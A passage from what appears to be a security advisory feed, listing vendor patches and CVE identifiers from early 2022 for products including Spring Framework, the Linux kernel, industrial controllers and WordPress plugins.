DPMS (DeltaStream PON Management System). A mitigation is available. CVE ID: CVE-2022-22965
VMware has released security updates and workarounds to resolve a critical Remote Code
Execution (RCE) vulnerability in the Spring Framework project. CVE ID: CVE-2022-22965 (Critical)
Ubuntu has released security updates to address several vulnerabilities in Linux Kernel. An
attacker can exploit these vulnerabilities to take control of an affected system.
Debian has released a security update to resolve a vulnerability in zlib that can cause Denial of
Service (DoS) or execution of arbitrary code. CVE ID: CVE-2018-25032 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-25299 (High)
HP has released security updates for Teradici PCoIP Graphics Agent for Windows, Linux &
macOS and Teradici PCoIP Standard Agent for Windows & Linux. The affected component is the
Mongoose web server prior to version 7.6. CVE ID: CVE-2022-25299 (High)
Multiple vulnerabilities such as Remote Code Execution (RCE) and Denial of Service (DoS)
vulnerabilities have been discovered in multiple Fortinet products. Security updates are
available for some products. CVE ID: CVE-2022-22965 (Critical), CVE-2022-22963 (High), CVE-2022-0778 (High)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. Updates are available
for some products. CVE ID: CVE-2022-0543 (Critical), CVE-2022-22950 (Medium), CVE-2022-0516 (High),
CVE-2022-23308 (High), CVE-2022-23710 (Medium)
Remote Code Execution vulnerabilities in Spring Framework / Spring Cloud Function are
affecting Nutanix products. The updates are available. CVE ID: CVE-2022-22965 (Critical), CVE-2022-22963 (Medium)
A code injection vulnerability has been discovered in Rockwell Automation's equipment,
Studio 5000 Logix Designer, that may allow an attacker to download a modified program to the
controller. CVE ID: CVE-2022-1159 (High)
Fuji Electric has released a security update to address multiple vulnerabilities in its
equipment, Alpha5, that can allow an attacker to disclose sensitive information and execute
arbitrary code. The affected products are Alpha5, all versions prior to 4.3. CVE ID: CVE-2022-21168 (Low), CVE-2022-21202 (Low), CVE-2022-24383 (High),
CVE-2022-21228 (High), CVE-2022-21214 (High)
Wordfence has released security updates to resolve a reflected Cross-Site Scripting (XSS)
vulnerability in WordPress' WP YouTube Live Plugin. The affected versions are WP YouTube
Live Plugin versions up to and including 1.7.21. CVE ID: CVE-2022-1187 (Medium)
Dell has released a security update to address an improper SMM communication buffer
verification vulnerability in Dell PowerEdge products, which can cause arbitrary writes or
Denial of Service (DoS). CVE ID: CVE-2022-22558 (Medium)
Google has released updated Chrome Beta 101 (101.0.4951.15) for Android, Dev channel
102.0.4972.0 for Windows, Linux and Mac, Chrome 101.0.4951.15 Beta channel for Windows, Mac
and Linux and Chrome Beta 101 (101.0.4951.17) for iOS.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
An inclusion of functionality from untrusted control sphere vulnerability has been
discovered in Rockwell Automation's equipment, Logix Controllers, which can allow an attacker
to modify user programs. Mitigations are available. CVE ID: CVE-2022-1161 (Critical)
General Electric Renewable Energy has released security updates to address multiple
vulnerabilities in its equipment, MDS iNET/iNET II/SD/TD220/TD220MAX Radios. Successful
exploitation of these vulnerabilities can allow an attacker to control the configuration of
the radio, join the network without proper authorisation or keep valid users from using the
system correctly. CVE ID: CVE-2017-17562 (Critical), CVE-2022-24119 (Critical), CVE-2022-24116 (High),
CVE-2022-24118 (Medium), CVE-2022-24120 (Medium), CVE-2022-24117 (High)
An OpenSSL infinite loop vulnerability has been discovered in Palo Alto Networks multiple
products that can result in a Denial-of-Service (DoS) to the application. CVE ID: CVE-2022-0778 (High)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Multiple vulnerabilities such as authentication bypass, information disclosure and
information tampering have been discovered in Mitsubishi Electric FA Products. Successful
exploitation of these vulnerabilities can allow login to the products, or the information in
the products may be disclosed or tampered with. CVE ID: CVE-2022-25155 (Medium), CVE-2022-25156 (Medium), CVE-2022-25157 (High),
CVE-2022-25158 (High), CVE-2022-25159 (Medium), CVE-2022-25160 (Medium)
A zero-day Remote Code Execution (RCE) vulnerability has been discovered in Java libraries,
with two vectors: Spring Core & Spring Cloud Function. CVE ID: CVE-2022-22963
Wordfence has released security updates to resolve an information disclosure vulnerability
in the Be POPIA Compliant WordPress plugin. The affected versions are Be POPIA Compliant
versions up to and including 1.1.5. CVE ID: CVE-2022-1186 (Medium)
IBM has released security updates to resolve multiple vulnerabilities in several products.
An attacker can exploit some of these vulnerabilities to take control of an affected system.
Dell has released a security update to address multiple vulnerabilities in Dell EMC NetWorker
Runtime Environment (NRE) and Dell EMC PowerProtect Data Manager.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
A missing authentication for critical function vulnerability has been discovered in Philips'
equipment, e-Alert, which allows an unauthorised actor to remotely shut down the system if
healthcare facilities are on the network. The affected products are e-Alert version 2.7 and
prior. CVE ID: CVE-2022-0922 (Medium)
An improper restriction of XML external entity reference vulnerability has been discovered
in Rockwell Automation's equipment, ISaGRAF, which can allow an attacker to pass local file
data to a remote web server, leading to loss of confidentiality. Updates and mitigations
are available. CVE ID: CVE-2022-1018 (Medium)
Multiple vulnerabilities have been discovered in Omron's equipment, CX-Position. Successful
exploitation of these vulnerabilities when parsing an NCI file can allow code execution. The
affected products are CX-Position versions 2.5.3 and prior. CVE ID: CVE-2022-26419 (High), CVE-2022-25959 (High), CVE-2022-26417 (High),
CVE-2022-26022 (High)
Modbus Tools has released a security update to resolve a stack-based buffer overflow
vulnerability in its equipment, Modbus Slave. Successful exploitation of this vulnerability can
crash the application when a registration key is entered. The affected products are Modbus
Slave versions 7.4.2 and prior. CVE ID: CVE-2022-1068 (Medium)
Multiple vulnerabilities have been discovered in several Jenkins plugins. An attacker can
exploit these vulnerabilities to take control of an affected system.
An information disclosure vulnerability has been discovered in VMware vCenter Server &
Cloud Foundation. The security updates are available. CVE ID: CVE-2022-22948 (Medium)
ASUS has released a software update to resolve multiple vulnerabilities in the ASUS Control
Center, an integrated management software. CVE ID: CVE-2022-26668, CVE-2022-26669
Google has released a security update for Dev channel 101.0.4951.13 (Platform version:
14588.23.0) for most Chrome OS devices, Chrome 100 (100.0.4896.58) for Android, Stable
channel Chrome 100.0.4896.60 for Windows, Mac and Linux, Dev channel 101.0.4951.15 for
Windows, Linux and Mac, and Chrome 100 (100.0.4896.56) for iOS.
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Mitsubishi Electric has released security updates & mitigations to resolve Denial of
Service (DoS) and Log4j vulnerabilities in MELSEC iQ-R, Q and L series CPU modules and in
SW1DNN-GN610SRC-M, all versions prior to Ver.1.02C, respectively. CVE ID: CVE-2021-44228 (Critical), CVE-2021-45046 (Critical), CVE-2021-45105
(Medium), CVE-2020-5652 (High)
Wordfence has released security updates to resolve an Arbitrary File Download vulnerability in
the Simple File List WordPress plugin. The affected versions are Simple File List versions up to
and including 3.2.7. The updated version 3.2.8 is available. CVE ID: CVE-2022-1119 (High)
Siemens has released a workaround & mitigation to resolve the SegmentSmack vulnerability in
Interniche IP-Stack based industrial devices, SIMATIC S7-300 and S7-400, which can lead to a
Denial-of-Service. CVE ID: CVE-2019-19300 (High)
Google has released updated Stable channel 99.0.4844.94 (Platform version: 14469.59.0) for
most Chrome OS devices, and Beta channel 100.0.4896.60 for Mac, Windows and Linux.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
NVIDIA has released a security update for NVIDIA CUDA Toolkit SDK to resolve an integer
overflow vulnerability which may lead to code execution, Denial of Service (DoS), or
information disclosure. CVE ID: CVE-2022-21821 (High)
Dell has released a security update to address a privilege escalation vulnerability in Dell
Command | Update, Dell Update, and Alienware Update versions before 4.5. CVE ID: CVE-2022-24426 (High)
It has been discovered that unauthorized users have accessed Moxa’s products by using the
default password. Moxa reminds all users to change all default passwords immediately to
enhance the security of their devices.
Google has released a security update for Chrome 99 (99.0.4844.88) for Android, Extended
Stable channel 98.0.4758.141 for Windows and Mac, Stable channel 99.0.4844.84 for Windows,
Mac and Linux, and Chrome Beta 101 (101.0.4951.8) for iOS. CVE ID: CVE-2022-1096 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The products affected
by critical vulnerabilities are PHP versions 7.4.x prior to 7.4.28, 8.0.x prior to 8.0.16,
and 8.1.x prior to 8.1.3 & NPM url-parse versions prior to 1.5.9. CVE ID: CVE-2021-21708 (Critical), CVE-2022-0686 (Critical), CVE-2022-0691 (Critical)
Sophos has released a workaround & remediation to resolve an authentication bypass
vulnerability in the User Portal and Webadmin of its Firewall. The affected products are
Sophos Firewall v18.5 MR3 (18.5.3) and older. CVE ID: CVE-2022-1040 (Critical)
Red Hat has released security updates to address multiple vulnerabilities in OpenShift
GitOps 1.4. CVE ID: CVE-2022-1025, CVE-2022-24730 (High), CVE-2022-24731 (Medium)
SonicWall has released security updates to address a stack-based buffer overflow
vulnerability in SonicOS, triggered via an HTTP request, that allows a remote unauthenticated
attacker to cause Denial of Service (DoS) or potentially result in code execution in the
firewall. The affected versions are SonicOS Gen 6 and Gen 7 firmware versions. CVE ID: CVE-2022-22274 (Critical)
mySCADA has released security updates to address a command injection vulnerability in
mySCADA's myPRO. Successful exploitation of this vulnerability can allow injection of arbitrary
operating system commands.
CVE ID: CVE-2022-0999 (High)
Yokogawa has released security updates to address multiple vulnerabilities in its CENTUM and
Exaopc equipment. Successful exploitation can suppress the alarms, read or write files,
crash the server or execute arbitrary code.
CVE ID: CVE-2022-21194 (High), CVE-2022-23402 (High), CVE-2022-21808 (High),
CVE-2022-22729 (High), CVE-2022-22151 (Medium), CVE-2022-21177 (Medium), CVE-2022-22145
(Medium), CVE-2022-22148 (High), CVE-2022-22141 (Medium), CVE-2022-23401 (High)
Google has released a security update for Chrome Beta 100 (100.0.4896.56) for Android, Beta
channel 100.0.4896.54 (Platform version: 14526.43.0) for most Chrome OS devices and Beta
channel 100.0.4896.56 for Mac, Windows and Linux.
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2021-4090 (High), CVE-2022-23235 (Low)
Debian has released a security update to address a vulnerability in php-twig that allows a
malicious user to execute arbitrary code.
CVE ID: CVE-2022-23614 (Critical)
VMware has released security updates to resolve OS command injection and file upload
vulnerabilities in VMware Carbon Black App Control which can cause Remote Code Execution
(RCE). CVE ID: CVE-2022-22951 (Critical), CVE-2022-22952 (Critical)
Cisco has released security updates to address a vulnerability in Cisco NX-OS Software for
Cisco Nexus 9000 Series Switches which can cause dropping of Bidirectional Forwarding
Detection (BFD) traffic on an affected device. CVE ID: CVE-2022-20623 (High)
A privilege escalation vulnerability and an unsupported vulnerability have been discovered in
the Drupal project's Role Delegation module and Colorbox Node, respectively. The update for the
Drupal project's Role Delegation module is available.
Google has released a security update for Dev channel 101.0.4951.6 (Platform version:
14588.11.0) for most Chrome OS devices and Dev channel 101.0.4951.7 for Windows, Linux and
Mac.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Multiple vulnerabilities have been discovered in Python, Apache HTTP Server, and OpenSSL
that affect NetApp products. An attacker can exploit these vulnerabilities to take control
of an affected system. Updates are available for some products. CVE ID: CVE-2022-0391 (High), CVE-2022-0778 (High), CVE-2022-22719 (High),
CVE-2022-22720 (Critical), CVE-2022-22721 (Critical), CVE-2022-23943 (Critical)
Delta Electronics has released security updates for DIAEnergie to resolve multiple
vulnerabilities. Successful exploitation of these vulnerabilities can allow an attacker to
retrieve passwords in cleartext, remotely execute code, cause a user to carry out an action
unintentionally, or log in and use the device with administrative privileges.
CVE ID: CVE-2021-33003 (Medium), CVE-2021-32967 (Critical), CVE-2021-32983
(Critical), CVE-2021-38390 (Critical), CVE-2021-38391 (Critical), CVE-2021-38393 (Critical),
CVE-2021-32991 (Medium), CVE-2021-23228 (High), CVE-2021-44544 (High), CVE-2021-31558
(Medium), CVE-2021-44471 (High), CVE-2022-0988 (High)
McAfee has released security updates to address multiple vulnerabilities in ePolicy
Orchestrator (ePO). This release addresses one blind SQL injection vulnerability in ePO and
updates three libraries (Java, Apache HTTP Server, and Tomcat) used by ePO.
CVE ID: CVE-2022-0842 (Medium), CVE-2022-0857 (Medium), CVE-2022-0858 (Medium),
CVE-2022-0859 (Medium), CVE-2022-0861 (Low), CVE-2022-0862 (Low), CVE-2021-42340 (Medium),
CVE-2021-34798 (High), CVE-2020-13938 (Medium)
Google has released a security update for Dev channel 101.0.4943.0 (Platform version:
14583.0.0) for most Chrome OS devices, and Stable channel 99.0.4844.86 (Platform version:
14469.58.0) for most Chrome OS devices.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Juniper Networks has released a security update to address multiple vulnerabilities in Junos
Space. These vulnerabilities affect Junos Space versions prior to 21.1R1.
Multiple vulnerabilities have been discovered in Mitsubishi Electric's products due to design
flaws in the frame fragmentation functionality and the frame aggregation functionality of
the IEEE 802.11 wireless communication standard. These vulnerabilities can allow an attacker to
steal communication contents or inject unauthorized packets. Workarounds are available.
CVE ID: CVE-2020-24586 (Low), CVE-2020-24587 (Low), CVE-2020-24588 (Low),
CVE-2020-26139 (Medium), CVE-2020-26140 (Medium), CVE-2020-26142 (High), CVE-2020-26143
(Medium), CVE-2020-26144 (Medium), CVE-2020-26145 (Medium), CVE-2020-26146 (Medium),
CVE-2020-26147 (Medium)
HP has released security updates to address information disclosure, denial of service, and
buffer overflow vulnerabilities in HP Print devices.
CVE ID: CVE-2022-24291 (High), CVE-2022-24292 (Critical), CVE-2022-24293 (Critical)
Debian has released security updates to address multiple vulnerabilities in Thunderbird,
which can result in the execution of arbitrary code or information disclosure.
CVE ID: CVE-2022-26381, CVE-2022-26383, CVE-2022-26384, CVE-2022-26386,
CVE-2022-26387
Drupal uses the third-party Guzzle library for handling HTTP requests and responses to external
services. Guzzle has released a security update which affects some Drupal sites.
CVE ID: CVE-2022-24775 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Western Digital has released security updates to address a directory traversal vulnerability
in EdgeRover that allows an attacker to carry out a local privilege escalation and escape
basic file-system sandboxing.
CVE ID: CVE-2022-22988 (Critical)
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
Multiple vulnerabilities have been discovered in FANUC Robot Controllers. Successful
exploitation can cause system software to stop working correctly due to data corruption.
CVE ID: CVE-2021-32996, CVE-2021-32998
NVIDIA has released a security update for NVIDIA Data Center GPU Manager (DCGM) to address a
vulnerability in nvhostengine that can lead to code execution, Denial of Service (DoS) and
escalation of privileges.
CVE ID: CVE-2022-21820 (Medium)
Johnson Controls has released security updates to address a vulnerability impacting Metasys
ADS/ADX/OAS Servers with the MUI feature. An authenticated attacker can inject malicious
code into the MUI PDF export feature.
CVE ID: CVE-2021-36202
Google has released a security update for Chrome Beta 100 (100.0.4896.46) for Android, Beta
channel 100.0.4896.44 (Platform version: 14526.28.0) for most Chrome OS devices, Beta
channel 100.0.4896.45 for Mac and 100.0.4896.45 for Windows and Linux.
The CKEditor library is used for WYSIWYG editing in Drupal projects. CKEditor has released a
security update that impacts Drupal.
CVE ID: CVE-2022-24728, CVE-2022-24729
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Security updates have been released for BIND to address multiple vulnerabilities.
CVE ID: CVE-2022-0667 (High), CVE-2022-0635 (High), CVE-2022-0396 (Medium),
CVE-2021-25220 (Medium)
Multiple vulnerabilities, such as stack-based buffer overflow and insecure loading of Dynamic
Link Libraries, have been discovered in KINGSOFT WPS Office and KINGSOFT Internet Security.
The affected products are no longer supported, and the developer recommends using alternative
unaffected products.
CVE ID: CVE-2022-2594 (High), CVE-2022-26081 (High), CVE-2022-25969 (High),
CVE-2022-26511 (High)
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
A vulnerability has been discovered in the CRI-O container engine for Kubernetes. This
vulnerability, dubbed cr8escape, can allow an attacker to escape from a Kubernetes container,
gain root access to the host and move anywhere in the cluster. The security
patch is available.
CVE ID: CVE-2022-0811 (High)
ASEA Brown Boveri (ABB) has released a security update to address an Execution with Unnecessary
Privileges vulnerability in OPC Server for AC 800M. Successful exploitation of this
vulnerability can allow a low privileged authenticated user to remotely execute arbitrary
code.
CVE ID: CVE-2021-22284 (High)
Apple has released security updates to address vulnerabilities in Safari. An attacker can
exploit these vulnerabilities to take control of an affected device.
CVE ID: CVE-2022-22654, CVE-2022-22610, CVE-2022-22624, CVE-2022-22628,
CVE-2022-22629, CVE-2022-22637
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Google has released a security update for Dev channel 101.0.4937.0 (Platform version:
14574.0.0) for most Chrome OS devices, Chrome 99 (99.0.4844.78) for Android, Extended Stable
channel has been updated to 98.0.4758.132 for Windows and Mac, Stable channel has been
updated to 99.0.4844.74 for Windows, Mac and Linux, and LTS channel has been updated to
96.0.4664.202 (Platform Version: 14268.77.0) for most ChromeOS devices.
CVE ID: CVE-2022-0971 (Critical)
Apache has released security updates for Apache HTTP Server to resolve multiple
vulnerabilities.
CVE ID: CVE-2022-22719, CVE-2022-22720, CVE-2022-22721, CVE-2022-23943
Dell has released a security update to resolve multiple vulnerabilities in third-party
components of Dell EMC Policy Manager, Dell EMC Secure Connect Gateway and Dell BSAFE SSL-J.
A Remote Code Execution (RCE) vulnerability has been discovered in Veeam Backup &
Replication which allows malicious code to be executed remotely without authentication. The
patches have been released for Veeam Backup & Replication versions 10 and 11 only.
CVE ID: CVE-2022-26500 (Critical), CVE-2022-26501 (Critical)
A Local Privilege Escalation (LPE) vulnerability has been discovered in QNAP NAS which
allows an unprivileged user to gain administrator privileges and inject malicious code. The
affected products are all QNAP x86-based NAS and QNAP ARM-based NAS running QTS 5.0.x and
QuTS hero h5.0.x.
CVE ID: CVE-2022-0847 (High)
A post authentication OS command injection vulnerability has been discovered in SonicWall's
Secure Remote Access (SRA) series products and Secure Mobile Access (SMA) 100 series
products. The updates are available for SMA100 Series products and no update has been
released for End of Life (EoL) products SRA Series version 9.0.0.5-19sv and earlier.
CVE ID: CVE-2022-22273 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Parse Server has released a security update to resolve a remote code execution (RCE)
vulnerability. This vulnerability affects Parse Server in the default configuration with
MongoDB.
CVE ID: CVE-2022-24760 (Critical)
Dell has released a security update to address multiple vulnerabilities in Dell PowerScale
OneFS that can potentially be exploited by malicious users to compromise the affected
system.
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
ASUS has released MyASUS version 3.1.2.0 for ASUS laptops and desktop PCs which contains
important security updates, including fixes for the CVE-2022-22814 vulnerability.
CVE ID: CVE-2022-22814 (Critical)
A privilege escalation vulnerability (a.k.a. Dirty Pipe) has been discovered in the Linux kernel
due to improper initialisation of the new pipe buffer structure.
CVE ID: CVE-2022-0847 (High)
Debian has released security updates to resolve XML parsing vulnerabilities in the Tryton
application platform which can cause information disclosure or Denial of Service (DoS).
CVE ID: CVE-2022-26661, CVE-2022-26662
An authentication bypass vulnerability has been discovered in NETGEAR DGND3700v2. NETGEAR
will not release a fix for this vulnerability on the affected product as it is outside of
the security support period.
Dell has released security updates for Dell Client Consumer and Commercial platforms to
address multiple SMM vulnerabilities that can potentially be exploited by malicious users to
compromise the affected system.
CVE ID: CVE-2022-24415 (High), CVE-2022-24416 (High), CVE-2022-24419 (High),
CVE-2022-24420 (High), CVE-2022-24421 (High)
Google has released security update for Chrome Beta 100 (100.0.4896.30) for Android, Beta
channel 100.0.4896.30 for Mac, Windows and Linux, Chrome Beta 100 (100.0.4896.28) for iOS,
Dev channel 101.0.4928.0 (Platform version: 14553.0.0) for most Chrome OS devices and Dev
channel 101.0.4929.5 for Windows, Linux and Mac.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Drupal has released security updates to address access bypass and Cross Site Scripting
vulnerabilities in Opigno Learning path and SVG Formatter module respectively.
Palo Alto Networks has released security updates for PAN-OS software and GlobalProtect app
to resolve use of a weak cryptographic algorithm and privilege escalation vulnerabilities
respectively.
CVE ID: CVE-2022-0016 (High), CVE-2022-0022 (Medium)
Schneider Electric has released mitigations to resolve multiple vulnerabilities in
EcoStruxure Control Expert, EcoStruxure Process Expert and SCADAPack RemoteConnect for x70,
caused by third-party components from AT&T Labs' XMill compressor and XDemill decompressor.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
WPS Office for Windows v11.2.0.10258 has been released to resolve a privilege escalation
vulnerability in earlier versions.
CVE ID: CVE-2022-25943 (High)
Rust has released a security update for the regex crate to address a vulnerability that left
applications open to Denial of Service (DoS) attacks.
CVE ID: CVE-2022-24713 (High)
Microsoft has released a security update to resolve a Remote Code Execution (RCE) vulnerability
in Microsoft Exchange Server. An attacker can exploit this vulnerability to take control of
an affected system. The affected products are Microsoft Exchange Server 2019, Microsoft
Exchange Server 2016 and Microsoft Exchange Server 2013.
CVE ID: CVE-2022-23277 (High)
Citrix has released a security update to address a vulnerability in AMD CPU hardware that may
allow code in a guest VM to infer the value of in-memory data in other guest VMs.
CVE ID: CVE-2021-26401
NVIDIA has released a security update for the NVIDIA JetPack Software Development Kit (SDK) to
resolve vulnerabilities in multiple products that can lead to Denial of Service (DoS),
escalation of privileges and impact to data integrity and confidentiality.
CVE ID: CVE-2021-34401 (High), CVE-2021-4034 (High), CVE-2022-21819 (High)
Hitachi Energy has released a security update to address multiple vulnerabilities in
open-source software components that are used in the RelCare Cloud and OnPrem versions.
CVE ID: CVE-2020-1967 (High), CVE-2021-3156 (High), CVE-2021-3449 (Medium),
CVE-2021-3450 (High), CVE-2021-27432 (High), CVE-2021-27434 (High), CVE-2021-28041 (High)
Microsoft has released updates to address multiple vulnerabilities in its software. A remote
attacker can exploit some of these vulnerabilities to take control of an affected system.
Mozilla has released security updates to address multiple vulnerabilities in Firefox and
Firefox ESR. An attacker can exploit these vulnerabilities to take control of an affected
system.
AVEVA has released security updates to address a cleartext storage of sensitive information in
memory vulnerability in AVEVA's System Platform.
CVE ID: CVE-2022-0835 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
Wordfence has released security updates to resolve arbitrary file upload and stored
Cross-Site Scripting (XSS) vulnerabilities in Ninja Forms File Uploads Extension WordPress
plugin.
CVE ID: CVE-2022-0888 (Critical), CVE-2022-0889 (High)
SAP has released security updates to address vulnerabilities affecting multiple products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Cisco has released security updates to address several vulnerabilities in Cisco Application
Policy Infrastructure Controller (APIC). An attacker can exploit these vulnerabilities to
take control of an affected system.
CVE ID: CVE-2021-1577 (Critical), CVE-2021-1579 (High), CVE-2021-1580 (Medium),
CVE-2021-1581 (Medium)
Multiple vulnerabilities such as escalation of privilege and information disclosure have
been discovered in Intel Trace Hub and Intel Processors respectively.
CVE ID: CVE-2021-33150 (Medium), CVE-2022-0001 (Medium), CVE-2022-0002 (Medium)
Proofpoint has released a security update to resolve an arbitrary code execution vulnerability in
Proofpoint Insider Threat Management (ITM) Agent for Windows.
CVE ID: CVE-2022-25294 (High)
A security update has been released to address a vulnerability in Linux kernel version 5.8
which allows overwriting data in arbitrary read-only files. The vulnerability has been fixed
in Linux 5.16.11, 5.15.25 and 5.10.102.
Multiple vulnerabilities have been discovered in Axeda agent, and Axeda Desktop Server for
Windows.
CVE ID: CVE-2022-25246 (Critical), CVE-2022-25247 (Critical), CVE-2022-25248
(Medium), CVE-2022-25249 (High), CVE-2022-25250 (High), CVE-2022-25251 (Critical),
CVE-2022-25252 (High)
Johnson Controls has released a security update to address the Log4j Remote Code Execution (RCE)
vulnerability in PowerManage versions 4.0 to 4.8.
CVE ID: CVE-2021-44228 (Critical)
Mozilla has released security updates to address vulnerabilities in Firefox, Firefox ESR,
Firefox for Android, Focus, and Thunderbird. An attacker can exploit these vulnerabilities
to take control of an affected system.
CVE ID: CVE-2022-26485 (Critical), CVE-2022-26486 (Critical)
Asterisk has released security updates to address out of bounds memory access, Denial of
Service (DoS) and arbitrary code execution vulnerabilities in multiple Asterisk products.
OMRON has released security updates to resolve multiple vulnerabilities in CX-Programmer
v9.76.1 and earlier versions, which is part of the CX-One (v4.60) suite.
CVE ID: CVE-2022-21124 (High), CVE-2022-25230 (High), CVE-2022-25325 (High),
CVE-2022-21219 (High), CVE-2022-25234 (High)
Digital Arts Inc. has released a security update to resolve an improper check for certificate
revocation vulnerability in i-FILTER. A Man-in-the-Middle (MITM) attack may allow an
adversary to eavesdrop on an encrypted communication.
CVE ID: CVE-2022-21170 (Medium)
Missing authentication for critical function and improper protection against electromagnetic
fault injection vulnerabilities have been discovered in Power Line Communications J2497 (a.k.a.
PLC4TRUCKS). Successful exploitation can allow a nearby attacker to execute diagnostic functions
in the trailer or light the trailer ABS fault telltale in a tractor.
CVE ID: CVE-2022-26131 (Critical), CVE-2022-25922 (Medium)
A use of hard-coded credentials vulnerability has been discovered in Becton, Dickinson and
Company's Viper LT equipment. Successful exploitation of this vulnerability can allow an
attacker to access, modify, or delete sensitive information.
CVE ID: CVE-2022-22765 (High)
A use of hard-coded credentials vulnerability has been discovered in Becton, Dickinson and
Company's Pyxis equipment. Successful exploitation can allow an attacker to gain access to
electronic Protected Health Information (ePHI) or other sensitive information.
CVE ID: CVE-2022-22766 (High)
IPCOMM has released a security update to address Cross-Site Scripting (XSS) and code injection
vulnerabilities in its ipDIO equipment. Successful exploitation can allow an attacker to
inject and execute arbitrary code. As ipDIO is considered an end-of-life product, IPCOMM
recommends upgrading to its ip4Cloud device.
CVE ID: CVE-2022-24432 (Medium), CVE-2022-21146 (Medium), CVE-2022-24915 (High),
CVE-2022-22985 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Google Chrome has released updated Chrome Beta 100 (100.0.4896.18) for Android, Beta channel
100.0.4896.20 for Windows, Mac and Linux, Dev channel 101.0.4918.0 (Platform version:
14543.0.0) for most Chrome OS devices and Dev channel 101.0.4919.0 for Windows, Linux and
Mac desktop.
Dell has released a security update to address multiple vulnerabilities in Dell EMC Integrated
System for Microsoft Azure Stack Hub which can potentially be exploited by malicious users
to compromise the affected system. The affected versions are Dell EMC 2112 and earlier.
Debian has released security updates to address a request smuggling vulnerability in
Varnish.
CVE ID: CVE-2022-23959 (Critical), CVE-2021-36740 (Medium)
SolarWinds has released a security update for Serv-U to address a directory traversal
vulnerability. This vulnerability can allow access to files relating to the Serv-U
installation and server files.
CVE ID: CVE-2021-35250 (High)
GitLab has released Community Edition and Enterprise Edition version 14.6.6 to resolve a
number of regressions and bugs in 14.6 release and prior versions.
A Cross-Site Scripting (XSS) vulnerability due to insufficient escaping and sanitization has
been discovered in the Amelia WordPress plugin. The affected versions are Amelia versions up to
and including 1.0.46. The updated version 1.0.47 is available.
CVE ID: CVE-2022-0834 (High)
Dell has released a security update to resolve multiple vulnerabilities in Dell EMC NetWorker
vProxy. The affected versions are Dell EMC NetWorker vProxy 4.3.0-15 and earlier.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Cisco has released security updates to address several vulnerabilities in multiple Cisco
products. The affected products are Cisco Expressway Series and Cisco TelePresence VCS,
Cisco Ultra Cloud Core SMI, Cisco ISE configured with RADIUS authentication services and the CLI
of Cisco StarOS.
CVE ID: CVE-2022-20754 (Critical), CVE-2022-20755 (Critical), CVE-2022-20762 (High),
CVE-2022-20756 (High), CVE-2022-20665 (Medium)
TerraMaster has released a security update to fix a security vulnerability related to the
Deadbolt ransomware attack in TerraMaster Operating System TOS 4.2.30 (ARM) and TOS 4.2.30
(X86).
VMware has released a security update to resolve an uncontrolled search path vulnerability in
VMware Tools for Windows. The affected versions are VMware Tools for Windows versions 11.x.y
and 10.x.y. The updated version 12.0.0 is available.
CVE ID: CVE-2022-22943 (Medium)
Google Chrome has released updated version Chrome 99 (99.0.4844.48) for Android, Chrome 99
(99.0.4844.47) for iOS, Extended Stable channel 98.0.4758.119 for Windows & Mac and
Stable channel 99.0.4844.51 for Windows, Mac & Linux.
Cisco has released a security update to address a vulnerability in the Cisco Discovery Protocol
service of Cisco FXOS Software and Cisco NX-OS Software. An attacker can cause a
Denial of Service (DoS) condition by sending a series of malicious Cisco Discovery Protocol
messages to an affected device.
CVE ID: CVE-2022-20625 (Medium)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
PJSIP, a multimedia communication library, has released version 2.12 to resolve multiple
vulnerabilities in its previous versions.
